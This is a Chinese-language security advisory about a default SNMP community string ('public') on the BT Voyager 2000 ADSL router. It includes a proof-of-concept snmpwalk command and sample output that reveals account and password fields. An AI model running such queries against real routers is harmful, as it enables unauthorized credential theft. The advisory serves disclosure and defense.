BT Voyager 2000 Wireless ADSL Router SNMP共同体串信息泄露漏洞

信息提供：

漏洞类别：

攻击类型：

发布日期：

更新日期：

受影响系统：

安全系统：

无

漏洞报告人：

漏洞描述：

BUGTRAQ  ID: 10589

BT Voyager 2000 Wireless ADSL Router是无线ADSL路由器。

BT Voyager 2000路由器存在默认共同体串，远程攻击者可以利用这个漏洞获得路由器敏感数据。

此路由器默认包含public SNMP MIB共同体串，攻击者利用这个值可获得敏感信息。

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1

SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router

SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6

SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84

[snip]

SNMPv2-SMI::transmission.23.2.3.1.5.5.1 = STRING:

"name surname btbroadband com"

SNMPv2-SMI::transmission.23.2.3.1.5.6.1 = ""

SNMPv2-SMI::transmission.23.2.3.1.5.7.1 = ""

SNMPv2-SMI::transmission.23.2.3.1.5.8.1 = ""

SNMPv2-SMI::transmission.23.2.3.1.5.9.1 = ""

SNMPv2-SMI::transmission.23.2.3.1.5.10.1 = ""

SNMPv2-SMI::transmission.23.2.3.1.5.11.1 = ""

SNMPv2-SMI::transmission.23.2.3.1.5.12.1 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.0.1 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.0.2 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.0.3 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.0.4 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.0.5 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.0.6 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.0.7 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.0.8 = ""

SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "password"

[snip]

解决方法：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户及时联系厂商以获取最新版本。